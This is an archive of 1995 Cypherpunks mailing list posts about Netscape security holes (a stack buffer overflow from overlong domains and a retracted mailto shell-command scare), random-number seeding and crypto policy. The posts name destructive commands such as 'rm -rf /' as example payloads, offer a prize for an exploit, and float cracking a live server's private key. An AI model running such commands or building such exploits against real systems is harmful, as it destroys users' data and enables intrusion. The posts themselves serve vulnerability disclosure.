Content-Type: text/plain




Disregard that last message. Those drugs I was taking must have just kicked
in. I was running another program in the background which coincidentally
brought up an xterm at the same time I clicked on the link. Damn,
and I thought I had found another bug. Ah well. There's probably one lurking
there somewhere. It was good while it lasted. When I hit "send" and
that xterm popped up, I almost jumped out of my seat. ;-) Remember
this lesson, you should always try to repeat your bugs atleast three
times. ;-)

-Ray









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Fri, 22 Sep 95 01:50:22 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: YET ANOTHER BAD NETSCAPE HOLE!
In-Reply-To: <199509220830.EAA13828@clark.net>
Message-ID: <9509220850.AA07248@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Ray Cromwell writes:
> WOW!! Unbelievable! Stop the presses! I Can't believe no one ever discovered
> this before! Try a page with the following URL
> 
>  test 
> 
> Muahaha! Yet another security hole! Clicking on this mailto brings up
> an xterm on my machine!  

This is curious, because Netscape 1.1N doesn't do this on my setup, unless I
misunderstand your description somehow. The full string including the pipe
and all come up in the To: field of the standard Netscape mailer window. At
that stage I see it as much less of a potential risk. I can't test what
happens if you actually try to send mail to such a trojan horse URL, because
there's some screwy configuration here that makes Netscape complain about
not being able to connect to localhost (!?!) when I try to send mail from it.

Mosaic 2.4 gives a standard warning page in response to this.

(I'm using SunOS 4.1.2)

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Fri, 22 Sep 95 02:01:29 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: The Next Hack
In-Reply-To: <199509211832.LAA24086@infinity.c2.org>
Message-ID: <9509220901.AA07381@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


sameer writes:
> 2) Organize a net-wide search over the space of the RNG seed to 
> crack the private key of some well known secure server.
> 
> 3) Release the private key to the net.

FWIW, for the record, I'm uncomfortable with this. It sounds unethical, IMHO.

For me at least, targeting the key of some particular server that happens to
be out there is over the line.

If you said you would have someone volunteer a supposedly secure server for
the challenge, I'd have no qualms.

But hey, that's just one tentacle's opinion....

-Futplex <futplex@pseudonym.com>
"...when you talk about destruction, don't you know that you can count me out"



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Fri, 22 Sep 95 02:36:12 PDT
To: jsw@neon.netscape.com (Jeff Weinstein)
Subject: Re: YET ANOTHER BAD NETSCAPE HOLE!
In-Reply-To: <43tvj4$t7v@tera.mcom.com>
Message-ID: <199509220936.FAA21793@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> In article <199509220836.EAA14476@clark.net>, rjc@clark.net (Ray Cromwell) writes:
> > Disregard that last message. Those drugs I was taking must have just kicked
> > in. I was running another program in the background which coincidentally
> > brought up an xterm at the same time I clicked on the link. Damn,
> > and I thought I had found another bug. Ah well. There's probably one lurking
> > there somewhere. It was good while it lasted. When I hit "send" and
> > that xterm popped up, I almost jumped out of my seat. ;-) Remember
> > this lesson, you should always try to repeat your bugs atleast three
> > times. ;-)
> 
>   Thanks for quickly posting this retraction.  For the record, netscape
> talks SMTP directly, and does not run an external program to send mail.

 No problem.  ;-) I congratulate you guys (Netscape) for reacting 
so quickly. ;-)

  BTW, I checked lynx for the big domain bug and it also crashes. It could
be a unix bug, but my own test program fails to crash looking up a
1000 character domain. Even so, Netscape should be enforcing a
sanity check on the domain.

-Ray




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Thu, 21 Sep 95 23:08:18 PDT
To: cypherpunks@toad.com
Subject: Re: Fraud Fraut Froth
In-Reply-To: <199509211130.HAA20039@light.lightlink.com>
Message-ID: <43tjr3$ps8@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <Pine.SUN.3.91.950921075223.28417A-100000@polaris.mindport.net>, unicorn@polaris.mindport.net (Black Unicorn) writes:
> On Thu, 21 Sep 1995 anonymous@freezone.remailer.mindport.net wrote:
> > Robert Herrig
> > Peekskill, N.Y., Sept. 19,1995.
> > 
> > The writer is a systems consultant.
> 
> [For Netscape?]

  No.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@lsd.com>
Date: Fri, 22 Sep 95 06:27:36 PDT
To: "David J. Bianco" <bianco@itribe.net>
Subject: Re: Cypherpunks Press release
Message-ID: <v03003311ac878dd1ef9a@[129.46.82.94]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:09 am 9/20/95, David J. Bianco wrote:
>On Sep 20, 10:28, Dietrich J. Kappe sent the following to the NSA's mail
>archives:
>> Subject: Cypherpunks Press release
>|| -----BEGIN PGP SIGNED MESSAGE-----
>||
>|| We've seen the word "hacker" kicked around rather arbitrarily in the
>press.
>|| Are we to conclude that the cypherpunks are a bunch of hackers? I think
>its
>|| time for some cypherpunks spin. How about a logo *and* a press release?
>The
>|| press release would give contacts (email, phone, etc.) so that someone
>on
>|| this list would be contacted by journalists when a crypto story breaks.
>||
>|| If we get enough volunteers, we can fax blanket every newspaper,
>station,
>|| and network in the world.
>||
>
>I think it's a great idea, personally.  I think many journalists would like
>to find third party opinions about network security and other cryptography
>issues, but just don't know who to talk to about them.  By making it easy
>for them to find us, we'd be more likely to be consulted for opinions.
[elided]

I think a media contact group is a good idea too, but I think we should
handle it by having a special address <cypherpunks-press@toad.com> that
media people can send to to request information and that it should split
the incoming mail and route it to a group of volunteers who could then
respond. Question from media people are usually NOT going to be heavily
tech-oriented, and this sort of press list would give the lesser
cryptologists among us, who nevertheless have a significant amount of
knowledge about public policy issues concerning crypto, a chance to be
useful.

BTW, <pgp-help-humans@hks.net> is still operating, and the small group of
knowledgeable cypherpunks there all see the mail that comes in and cc the
list when someone asks a PGP question and gets it answered by one or more
of the volunteers. This would be a good model to expand on, imho. Everyone
learns something, people go away impressed by the quality answers, etc. :)

   dave






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Fri, 22 Sep 95 03:38:00 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Project: a standard cell random number generator
In-Reply-To: <9509202150.AA08164@toad.com>
Message-ID: <9509221037.AA08096@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


John Gilmore writes:
> In this sense, NSA ought to be *encouraging* Intel and
> IBM and Motorola to put "generate random bits" instructions into
> their instruction sets...

Does Tessera include any form of hardware RNG ?

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Fri, 22 Sep 95 03:43:58 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: RNG Resource FAQ (was Re: "random" number seeds vs. Netscape)
In-Reply-To: <30609562.15FB@netscape.com>
Message-ID: <9509221043.AA08133@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Perry Metzger writes:
# You might want to read RFC 1750,

Phil Karlton writes:
> Did that. It talks about a lot of the pitfalls. Unfortunately it does not 
> address (nor can it realistically be expected to address) details of what
> to look for on a particular version of an OS running on some particular 
> platform.

Can someone point me to a compilation of such information ?  If not, I'm
definitely interested in starting a Web page to chronicle recommendations
about good, bad, and questionable random and pseudo-random sources for
specific architectures and operating systems. (It could also include
information on special-purpose plug-in hardware RNGs.)

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Thu, 21 Sep 95 23:54:35 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape closes up 1 3/8 today!
In-Reply-To: <199509212030.NAA05084@infinity.c2.org>
Message-ID: <43tmht$qfe@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199509212125.RAA00188@hoopsnake.cjs.net>, cjs@netcom.com (Christopher J. Shaulis) writes:
> And the sad part is that now that they have announced that they are
> dropping their unofficial Linux support, I really want to hurt
> Netscape badly.

  This is news to me.  We have engineers spending valuable time keeping
our linux port running.  If you tell me where you saw this, I will look
into it.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Fri, 22 Sep 95 00:34:29 PDT
To: cypherpunks@toad.com
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <199509220612.CAA11441@clark.net>
Message-ID: <43tosm$qfe@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199509220612.CAA11441@clark.net>, rjc@clark.net (Ray Cromwell) writes:
> I've found a Netscape bug which I suspect is a buffer overflow and
> may have the potential for serious damage. If it is an overflow bug,
> then it may be possible to infect every computer which accesses a web
> page with Netscape. To see the bug, create an html file containing
> the following:

  Thanks for the report.  I will make sure that this is fixed.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 22 Sep 95 07:39:36 PDT
To: perry@piermont.com
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <199509221236.IAA03762@frankenstein.piermont.com>
Message-ID: <199509221434.HAA28036@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> The problem is that if you don't produce a (benign) exploit people
> aren't going to take it seriously enough.
> 

	And without an exploit you won't get a t-shirt. (In general,
an exploit is required for a t-shirt to be made & awarded. Exceptions
may be granted, however, depending upon the situation.)

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Fri, 22 Sep 95 00:53:01 PDT
To: cypherpunks@toad.com
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <v01510100ac8821ac2b23@[206.1.161.4]>
Message-ID: <43tpv8$rom@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


  OK, Perry was right, and it was wrong of me to argue with him based
only on the code that I have personally seen.  As we have already
determined, I have not reviewed every line of code in netscape.

  Not that I want to divert attention away from netscape(OK, maybe I
do :-) ), but does this bug exist in any other common browser?

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Fri, 22 Sep 95 05:03:52 PDT
To: cypherpunks@toad.com
Subject: Re: Patents and trade secrets was: Encryption algorithms used in PrivaSoft
Message-ID: <v02120d0aac8853dc6923@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


Historical example time...

>(0) Alice invents a snaffleblort.
     Some Other Guy invented telephone
>(1) Bob invents a snaffleblort.
     A.G. Bell invented telephone.
>(2) Bob files for a patent on a snaffleblort.
     A.G. Bell files 6 hours earlier.

Actually happened. We know what happened...


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Fri, 22 Sep 95 08:15:47 PDT
To: cwe@Csli.Stanford.EDU
Subject: Re: Exchange random numbers (was: Re: netscape's response)
Message-ID: <9509221511.AA19305@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> This isn't a problem as I see it, he'll only know what bits he
> flipped, not the actual state.

Wouldn't even know that if you permuted it.  You _could_ use a fixed
permutation, or you could use input information from another source
to select the permutation.  Even something as simple as taking 5 bits
from one source and using another source mod(random seed length) to
decide where to xor it into the random seed.  (Rotating back to the 
front if needed, or you could let the bits fall off the end.) And if
all you ever give out to randomness partners is the result of a good
hash there's no way they could ever determine anything from it, or
determine what effect their contribution had.  Shoot, they wouldn't
know if their contribution went into the seed, or merely affected
how someone elses contribution went into the seed.

Patrick

   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Fri, 22 Sep 95 08:23:07 PDT
To: perry@piermont.com
Subject: Re: Seeds which depend on machine states
Message-ID: <9509221519.AA19310@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Miguel Diaz writes:
> > It is my suspicion that seeds which depend on machine 
> > states(ie state of your computer at a specific instance of 
> > time) would always be subject to scrutiny and de-cryption.
> > As long as the software used to encrypt is not self-modifying, 
> > the machine state can (through careful manipulation involving 
> > temperature, clocks, processes etc)always be replicated and 
> > fixed to an acceptable degree.
> 
> Try getting a human to type with the same timing, to microsecond
> precision, the same way twice.
> 
That assumes that you have someway of measuring the timing to microsecond
precision.  On most machines I've been on, if you get something time-
stamped, even if there is a microsecond portion of the timestamp it's
meaningless because it wasn't based on a timer with the required precision.
If a timer can only resolve milliseconds, the microseconds don't have any
meaning.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 22 Sep 95 05:25:00 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <199509220612.CAA11441@clark.net>
Message-ID: <199509221224.IAA03734@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Ray;

This is evidence that, as I said, they have plenty of buffer overflow
bugs. So much for the protestations to the contrary.

My suspicion is that if you used a customized HTTPd that allowed you
to shove arbitrary data into your URL, you could get the victim's copy
of netscape to fandango on the stack and do nicely arbitrary things to
the victim -- like executing "cd ~/; rm -rf ."

A "Hack Netscape" T-Shirt for the first person (Ray, here is your
chance!) to find an exploit using this! Though your demo shouldn't do
anything bad. Does everyone think Ray should get a shirt no matter what?

Perry

Ray Cromwell writes:
> 
> I've found a Netscape bug which I suspect is a buffer overflow and
> may have the potential for serious damage. If it is an overflow bug,
> then it may be possible to infect every computer which accesses a web
> page with Netscape. To see the bug, create an html file containing
> the following:
> 
> <a href="http://foo.bar.foo[rest of giant URL elided]
> 
> On my BSDI2.0 machine running Netscape 1.1N, this causes a segmentation
> fault and subsequent coredump. GDB reports nothing useable (stripped
> executable)
> 
> As you can see, I just chose an extremely long domain name. I guessed
> that the authors of netscape probably thought something like "well,
> a buffer size of 256 characters is good enough to hold any domain"
> 
> It's definately the domain that's causing it, and not the length of
> the URL or the data after the domain name.
>  
> I also tried to overflow some netscape servers using similar techniques
> (and shell metacharacters in all sorts of URLs), to no avail. I suspect
> a similar attack may work against the Netscape Server if it is proxying.
> 
> 
> Does anyone have a disassembly of Netscape, or more specifically, 
> a disassembly of the URL parse and domain lookup routines? I'd be
> happy to collaborate and "Hack Netscape" ;-)
> 
> 
> Happy Hacking,
> -Ray
>  
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Fri, 22 Sep 95 05:29:28 PDT
To: jirib@cs.monash.edu.au
Subject: Re: first virtual "security" (!!) (was Re: Security Flaw Is Discovered InSoftware Used in Shopping)
In-Reply-To: <199509220137.LAA12354@sweeney.cs.monash.edu.au>
Message-ID: <UkMehqWMc50e0Eb0xP@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail.fv: 22-Sep-95 Re: first virtual "security.. Jiri
Baum@sweeney.cs.mon (1560*)

> > >financial insecurity never was a problem as
> > >long as it remains under a small %.
> > 
> > This is an amazing statement, Laurent.

> It's not an amazing statement. As long as the cost of insecurity is
> less than cost of security, there's no problem.

I think the basic confusion here is precisely about the cost.

The cost of having one credit card stolen is small.

The cost of having millions stolen at once is *astronomical*.  It really
could bring down the whole credit card system, if that was the
criminal's goal.

My concern is about schemes in which the compromise of the cryptographic
algorithms or software leads to a scenario in which one criminal steals
millions of credit cards.  In such a scenario, the cost of insecurity is
unacceptably high.

> Okay, so what's stopping you from starting right now with PGP?
> You could simply have that as an alternative to the current system
> (on a per-ID basis, ie new customers specify PGP or not).

> Quite a few people both have PGP and would think well of you if you
> started using it.

> How about "The safest Internet payment system just got safer."?

We're definitely moving in this direction.  It's more complicated than
you make it sound, though.  Personally, I don't want to use any
cryptography without an explicit, clear, policy and mechanism for key
expiration and key lifetimes.  The risk of key compromise is directly
proportional to the key lifetime.  PGP today -- which we use very
heavily internal to FV -- is not well-equipped for dealing with key
management issues on a scale of millions of users.

Now, having said that...  we're currently planning to deploy FV version
2 before the end of the year.  Version 2 *will* include the first use of
PGP in the FV system, but it will NOT work the way you probably expect. 
Stay tuned!  -- Nathaniel
--------
Nathaniel S. Borenstein <nsb@fv.com>    |           When privacy is outlawed,
Chief Scientist, First Virtual Holdings |     only outlaws will have privacy!
FAQ & PGP key: nsb+faq@nsb.fv.com       | SUPPORT THE ZIMMERMANN DEFENSE FUND!

---VIRTUAL YELLOW RIBBON-->> zldf@clark.net <http://www.netresponse.com/zldf>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 22 Sep 95 05:27:02 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: Netscape bug update
In-Reply-To: <199509220626.CAB16453@clark.net>
Message-ID: <199509221226.IAA03742@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



I've decided that I'll pay Sameer for the shirt for Ray,
regardless.

However, if someone else produces the exploit first, they should get
one, too!

.pm

Ray Cromwell writes:
> 
>   I just verified in GDB using a stack trace that the Netscape overflow
> bug I mentioned is indeed a static stack buffer overflow. It trashes
> the stack.
> 
>   What this means is that in theory, it is possible to get a simple
> URL, if clicked on, to execute some code on someone's browser.
> 
>   Now the hard work begins...
> 
> 
> Happy Hacking,
> -Ray
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David J. Bianco" <bianco@itribe.net>
Date: Fri, 22 Sep 95 05:30:10 PDT
To: Ray Cromwell <cypherpunks@toad.com
Subject: Re: Netscape bug update
In-Reply-To: <199509220626.CAB16453@clark.net>
Message-ID: <199509221227.IAA22985@gatekeeper.itribe.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sep 22,  2:26, Ray Cromwell sent the following to the NSA's mail
archives:
> Subject: Netscape bug update
||
||   I just verified in GDB using a stack trace that the Netscape overflow
|| bug I mentioned is indeed a static stack buffer overflow. It trashes
|| the stack.
||
||   What this means is that in theory, it is possible to get a simple
|| URL, if clicked on, to execute some code on someone's browser.
||
||   Now the hard work begins...
||

This is a new feature of Netscape 2.0, part of the Java package
I believe... ;-)

--
==========================================================================
David J. Bianco			| Web Wonders, Online Oddities, Cool Stuff
iTribe, Inc.			| Phone: (804) 446-9060 Fax: (804) 446-9061
Suite 1700, World Trade Center	| email: <bianco@itribe.net>
Norfolk, VA 23510		| URL  : http://www.itribe.net/~bianco/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Fri, 22 Sep 95 08:35:52 PDT
To: perry@piermont.com
Subject: Re: "random" number seeds vs. Netscape
Message-ID: <9509221532.AA19315@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Nor is there anything inherently wrong with having sex without the use
> of a condom.

YES!  Safe exec!  Use software protection;)  (Can you tell that when I read
this I was LOL!?)

> 
> However, it is very difficult -- VERY DIFFICULT -- to prove to
> yourself that there is never an instance in which your system() or
> popen() can be abused.

Well...you can tell by looking, certainly that's not true when you need
a condem;)

>                         In any case, I find its often more prudent just
> to strip all these things out of my code. If you don't use them, you
> don't have to prove they are done properly. Paranoia is your
> friend. No one can ever break you for doing something you don't do.

That's true, I have to admit that I usually don't use them either.  Once
you know how they're coded up, and how little code is actually used, it
seems silly anyway to call a popen or system and suffer the overhead of
the function calls and the loss of control.

> 
> > The problem arises when you use information given to you from
> > outside as the argument to popen or system without checking it.
> 
> Yup, but often, you'd be suprised what turns out to be outside data.

You're singing to the choir.  Sigh, Eric Allman's been several times
surprised about what turned out to be outside data.

> 
> In any case, you obviously also understand why this is bad, but I hope
> that people out there understan -- always make sure that you are
> double extra careful about the use of such calls.

Thanks:)

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 22 Sep 95 05:36:15 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <199509220715.DAA27920@clark.net>
Message-ID: <199509221236.IAA03762@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Ray Cromwell writes:
> THIS IS A SERIOUS BUG!
[...]
> [I hear Perry in the background groaning and muttering "I told you so"]

Of course I told you so. I knew what I was saying when I mentioned
buffer overflows being a big problem in code written by the NCSA team,
most of whom went over to Netscape When at NCSA, they showed very
little capacity to learn this lesson no matter how many cracks
occured. They always just tried to kludge around the thing instead of
fixing it. When I write security oriented code, I outright ban the use
of certain C library calls.

> These buffer overflow bugs should be taught in every programming
> 101 course along with fencepost errors.
> 
> I'm not even sure if I want to write the obligatory program to exploit
> the hack given that some malicious jerk would probably use it
> on his home page to attack people.

The problem is that if you don't produce a (benign) exploit people
aren't going to take it seriously enough.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 22 Sep 95 05:43:45 PDT
To: jsw@neon.netscape.com (Jeff Weinstein)
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <43tpv8$rom@tera.mcom.com>
Message-ID: <199509221243.IAA03781@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Jeff Weinstein writes:
>   OK, Perry was right, and it was wrong of me to argue with him based
> only on the code that I have personally seen.  As we have already
> determined, I have not reviewed every line of code in netscape.
> 
>   Not that I want to divert attention away from netscape(OK, maybe I
> do :-) ), but does this bug exist in any other common browser?

Probably in Mosaic, though not necessarily in the same place. Its a
case of the same programmers making the same mistakes over and over
again.

I don't believe the Sun Java stuff would suffer from it, although I
fear Java a great deal.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 22 Sep 95 05:48:01 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: YET ANOTHER BAD NETSCAPE HOLE!
In-Reply-To: <199509220830.EAA13828@clark.net>
Message-ID: <199509221247.IAA03798@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Its hardly suprising to me. Look at the link list on any dynamically
linked version of netscape and you'll see lots of calls that look very
suspicious.

I keep telling people this sort of thing and no one at Netscape
listens, although I believe that we may have made a couple of converts
in the firm now.

Perry

Ray Cromwell writes:
> > 
> > On the bright side, mailto: hyperlinks containing extra-long domain names
> > seem to be handled comparatively safely in both Netscape and Mosaic. 
> > (Perhaps they just have longer buffers ? ;)
> 
>   Good question. My guess is, Netscape doesn't do any processing on the
> mailto: hyperlink at all, but merely passes it to a real mail delivery
> agent like Sendmail (or it uses MAPI under Win'95). Which begs
> the question, if Netscape is executing an external delivery agent,
> there may be the possiblity of sneaking an attack in there and getting
> the shell to execute something.
> 
> Hmm, let me try something.
> 
> 
> WOW!! Unbelievable! Stop the presses! I Can't believe no one ever discovered
> this before! Try a page with the following URL
> 
>  test 
> 
> Muahaha! Yet another security hole! Clicking on this mailto brings up
> an xterm on my machine!  Simply change the xterm& to "rm -rf /" and
> bingo!
> 
> 
> Sheesh. I better stop before I am on Netscape's most hated list.
> 
> 
> -Ray
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 22 Sep 95 05:57:45 PDT
To: jim@acm.org
Subject: Re: Project: a standard cell random number generator
In-Reply-To: <199509221110.EAA03110@mycroft.rand.org>
Message-ID: <199509221257.IAA03853@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Gillogly writes:
> > futplex@pseudonym.com (Futplex) writes:
> > Does Tessera include any form of hardware RNG ?
> 
> Yes.  Here's a released CAPSTONE spec sheet.

That probably means that this sort of thing *can* be made cost
effective on ordinary chips. Now we have to get Tim to lobby Intel to
put RNGs on the P7 chip :-)

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Fri, 22 Sep 95 09:07:49 PDT
To: perry@piermont.com
Subject: Executing code on the stack, was Re: netscape bug
Message-ID: <9509221604.AA19341@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> very big, and you can do what you like. The 8lgm people wrote a demo
> for Sparc as a proof of concept.

It's worth mentioning that 8lgm (Eight little green men;) has recently
changed their policy on how long they wait to make exploit scripts available.
It has resonance with what's happened here on cypherpunks lately.  They
used to publish that there was a hole, but would hold up quite a while
on making the exploit scripts available.  They were trying to make it
safer for manufacturers and give them time to make fixes available first.
What actually happened is that manufacturers would put the fixes on the
backburner, and often not get around to them at all.  8lgm found that
publishing the exploit scripts usually resulted in quick fixes from the
vendors.  Now the exploitation details are available quite quickly.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Fri, 22 Sep 95 09:14:15 PDT
To: rjc@clark.net
Subject: Re: Another Netscape Bug (and possible security hole)
Message-ID: <9509221610.AA19346@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> [I hear Perry in the background groaning and muttering "I told you so"]
> These buffer overflow bugs should be taught in every programming
> 101 course along with fencepost errors.
> 
> I'm not even sure if I want to write the obligatory program to exploit
> the hack given that some malicious jerk would probably use it
> on his home page to attack people.
> 
You should consider that there are people with a lot of expertise that are
constantly on the lookout for things like this.  I would bet a nickel to
a donut that many people in the cracker community discovered this a long
time ago and that exploit code was written long ago.  How many people 
logged in as root use netscape?

If the source was available we'd have told them about this long ago.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Fri, 22 Sep 95 02:22:41 PDT
To: cypherpunks@toad.com
Subject: Re: Mosaic Bug (same as Netscape bug) (was Re: Another Netscape Bug)
In-Reply-To: <43tpv8$rom@tera.mcom.com>
Message-ID: <43tv6v$t7v@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <9509220801.AA06875@cs.umass.edu>, futplex@pseudonym.com (Futplex) writes:
> Now, the question is, does Netscape use _the same code_ that was used in
> Mosaic for this purpose ?

  Absolutely not.  There is not a single line of Mosaic code in our product.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




